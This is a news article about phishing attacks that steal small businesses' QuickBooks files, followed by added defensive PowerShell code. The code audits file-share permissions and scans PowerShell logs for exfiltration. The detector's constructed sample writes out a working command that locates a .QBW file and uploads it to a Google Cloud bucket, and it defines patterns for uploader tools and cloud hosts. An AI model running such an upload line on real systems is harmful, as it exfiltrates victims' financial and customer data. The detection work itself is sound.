Stolen financial files then get sold on the Dark Web, researchers say.

Steve Zurier, Contributing Writer, Dark Reading

February 24, 2021

Cybercriminals increasingly have targeted QuickBooks file data at small and midsize businesses (SMBs) over the past few months, according to new research.

The breaches start with one of two phishing lures used to gain access to QuickBooks databases, according to findings by ThreatLocker. In the first, the attackers embed a PowerShell command in the malicious email. In the second, the attackers email a Word document; if the recipient opens the attachment, a macro or link within it downloads a file onto the machine. Once the executable or PowerShell command runs, it looks up the location of the victim's most recently saved QuickBooks file, whether on a file share or on the local disk, and copies that file out.

Danny Jenkins, co-founder and CEO of ThreatLocker, says the attackers usually upload the stolen files to either Google Cloud or Amazon Web Services as a temporary transfer point. From there, they sell the data on the Dark Web, where other cybercriminals buy the data to launch more targeted attacks on other QuickBooks databases or on the customers and suppliers of the victim organizations.

"They will attack every angle possible," Jenkins adds. "Cybercriminals can easily buy these QuickBooks databases on the Dark Web and launch attacks."

Meanwhile, some 43% of organizations of all sizes say they've been victims of a spear-phishing attack in the past 12 months, according to data from Barracuda Networks, and only 23% say they have dedicated spear-phishing protection in place.

"Most of the emails are invoices and resumes," ThreatLocker's Jenkins explains of the lures. "We don't have exact numbers, but we do know that millions of dollars in cybercrime is caused by these types of attacks."

Accounting programs are often written without taking security into consideration, Jenkins notes, and QuickBooks has a fundamental flaw: When an administrator runs a "repair" on the QuickBooks database after a system crash, all the file-share permissions can be reset, leaving the database accessible by everyone in the company. This means that if attackers compromise any user's machine after a repair, that account can read the database just as the company's accountant or business manager can.

"People wonder how the hackers have access to all their customer accounts, but it's really quite simple: Once they have access to the QuickBooks database, they have access to all your customers," Jenkins says. "What we're telling SMBs is to restrict permissions by user and by application. There's no reason for Microsoft Office or PowerShell to have access to QuickBooks."
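The permission reset described above and Jenkins's advice to restrict access by user are straightforward to check for. The following is an added example (not code from ThreatLocker, Intuit or the article) that audits the NTFS ACLs on QuickBooks company files and the SMB share permissions on the host for broad Allow entries. It assumes company files carry the .QBW extension and live under the paths in $SearchRoots; both are assumptions to adjust for your environment.

```powershell
# Added example: find QuickBooks company files whose NTFS or SMB share permissions
# grant access to broad groups (the condition a "repair" is said to leave behind).
# Assumptions: company files use the .QBW extension and sit under $SearchRoots.

$SearchRoots = @('C:\Users\Public\Documents\Intuit\QuickBooks', 'D:\Shares\Accounting')

# Principals that should never hold rights on an accounting database.
$BroadPrincipals = @(
    'Everyone',
    'NT AUTHORITY\Authenticated Users',
    'BUILTIN\Users',
    'NT AUTHORITY\INTERACTIVE'
)
# "Domain Users" is domain-qualified (CORP\Domain Users), so match it by suffix.
$BroadSuffix = '\Domain Users'

function Test-BroadPrincipal {
    param([string]$Identity)
    return ($BroadPrincipals -contains $Identity) -or $Identity.EndsWith($BroadSuffix)
}

# 1. NTFS ACLs on every company file found under the search roots.
$ntfsFindings = foreach ($root in $SearchRoots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }
    Get-ChildItem -LiteralPath $root -Filter '*.qbw' -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            $acl = Get-Acl -LiteralPath $file.FullName
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -eq 'Allow' -and (Test-BroadPrincipal $ace.IdentityReference.Value)) {
                    [pscustomobject]@{
                        Scope     = 'NTFS'
                        Path      = $file.FullName
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                        Inherited = $ace.IsInherited
                    }
                }
            }
        }
}

# 2. SMB share permissions: a share that grants Everyone Full or Change lets any
#    compromised workstation pull the file regardless of who is logged on.
$shareFindings = Get-SmbShare -Special $false -ErrorAction SilentlyContinue |
    Get-SmbShareAccess -ErrorAction SilentlyContinue |
    Where-Object { $_.AccessControlType -eq 'Allow' -and (Test-BroadPrincipal $_.AccountName) } |
    ForEach-Object {
        [pscustomobject]@{
            Scope     = 'SMB'
            Path      = "\\$env:COMPUTERNAME\$($_.Name)"
            Principal = $_.AccountName
            Rights    = $_.AccessRight
            Inherited = $false
        }
    }

$findings = @($ntfsFindings) + @($shareFindings)
if ($findings.Count -eq 0) {
    Write-Output 'No broad Allow entries found on QuickBooks company files or SMB shares.'
} else {
    $findings | Format-Table -AutoSize
    Write-Warning "$($findings.Count) broad permission grant(s) found; scope QuickBooks file access to the accounting group only."
}
```

Run it from an elevated session on the file server after any repair or restore, and treat every row it prints as a permission to remove: the expected state is an Allow entry for a dedicated accounting group and for the QuickBooks Database Server service account, and nothing broader.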

ThreatLocker detailed its research in a blog post today.

Dirk Schrader, global vice president, security research at New Net Technologies, says the QuickBooks attacks are notable for their simplicity. The attackers are using only a few lines of PowerShell script and exploiting design weaknesses in QuickBooks, a software application often used by smaller companies, many of which lack the expertise and staffing to stay up to par with cybersecurity issues.

Schrader says SMBs should control whether PowerShell scripts can be executed with the current user's rights and permissions. While that might be overwhelming for some small organizations, they can instead look to secure configuration management and change control to detect the malicious file drops.
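Where locking down PowerShell outright is too much for a small shop, the "few lines of PowerShell" Schrader describes still leave a trace once script block logging is enabled. The following is an added example (not code from the researchers quoted here) that runs a simple detection pass over PowerShell script block log entries, looking for the two-step pattern the article describes: a reference to a QuickBooks company file followed by an upload to a Google Cloud or AWS storage endpoint. The sample events are constructed for illustration, the .QBW extension and the bucket hostnames are assumptions, and the regexes are a starting point rather than a complete signature.

```powershell
# Added example: score PowerShell script block log text (Event ID 4104 in
# Microsoft-Windows-PowerShell/Operational) for the QuickBooks-file-then-upload pattern.
# Script block logging must be enabled first, e.g. via Group Policy or the registry value
#   HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
#   EnableScriptBlockLogging = 1 (DWORD)

# Constructed sample events standing in for parsed 4104 records (Time, User, script text).
$sample = @(
    @{ Time = '2021-02-24T09:12:03'; User = 'CORP\jdoe'
       Text = 'Get-ChildItem -Path $env:USERPROFILE -Recurse -Include *.pdf | Measure-Object' },
    @{ Time = '2021-02-24T09:14:41'; User = 'CORP\jdoe'
       Text = '$f = Get-ChildItem -Path $env:USERPROFILE -Recurse -Include *.QBW | Select-Object -First 1; Invoke-RestMethod -Uri https://storage.googleapis.com/bkt-7f2/up -Method Put -InFile $f.FullName' },
    @{ Time = '2021-02-24T09:20:15'; User = 'CORP\svc-backup'
       Text = 'Copy-Item "D:\Shares\Accounting\Company.QBW" "E:\Backups\Company.QBW"' }
)

# Indicators. PowerShell's -match is case-insensitive by default.
$QuickBooksFile = '\.qbw\b|quickbooks'                                   # assumed company-file extension
$Uploader       = 'Invoke-RestMethod|Invoke-WebRequest|\.UploadFile\(|curl(\.exe)?\s|bitsadmin'
$CloudBucket    = 'storage\.googleapis\.com|s3[\w.-]*\.amazonaws\.com'   # GCS / S3 (assumed hostnames)

function Get-QuickBooksExfilAlerts {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        $hits = @()
        if ($e.Text -match $QuickBooksFile) { $hits += 'qbw-file' }
        if ($e.Text -match $Uploader)       { $hits += 'uploader' }
        if ($e.Text -match $CloudBucket)    { $hits += 'cloud-bucket' }
        if ($hits.Count -eq 0) { continue }

        # All three indicators in one script block is the full chain; one alone is
        # usually legitimate (backup jobs touch .QBW files, admins call Invoke-WebRequest).
        $severity = switch ($hits.Count) { 3 { 'high' } 2 { 'medium' } default { 'low' } }

        [pscustomobject]@{
            Time       = $e.Time
            User       = $e.User
            Severity   = $severity
            Indicators = ($hits -join ',')
            Snippet    = $e.Text.Substring(0, [Math]::Min(80, $e.Text.Length))
        }
    }
}

# To run against the live log instead of the constructed sample: for 4104 events the
# script block text is Properties[2] and UserId is the SID of the account that ran it.
# $live = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { @{ Time = $_.TimeCreated; User = $_.UserId; Text = $_.Properties[2].Value } }
# Get-QuickBooksExfilAlerts -Events $live | Where-Object Severity -ne 'low'

Get-QuickBooksExfilAlerts -Events $sample | Format-Table -AutoSize
```

On the constructed sample the second event scores high (file lookup, uploader and bucket in one block), the backup job's Copy-Item scores low, and the PDF inventory is ignored. Forwarding the high and medium rows to whatever alerting the organization already has is the "change control to detect the malicious file drops" Schrader describes, at a cost a small team can carry.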

"Unfortunately, SMBs have to make a very first step, which is to acknowledge that a cyberattack will happen to them and that they are not too small to be of interest," Schrader says. "The interest the hackers have is to get the SMB's information about their customers [and then] work up to the larger corporate targets — be they customers or suppliers of the SMB."

About the Author(s)

Steve Zurier

Contributing Writer, Dark Reading

Steve Zurier has more than 30 years of journalism and publishing experience and has covered networking, security, and IT as a writer and editor since 1992. Steve is based in Columbia, Md.
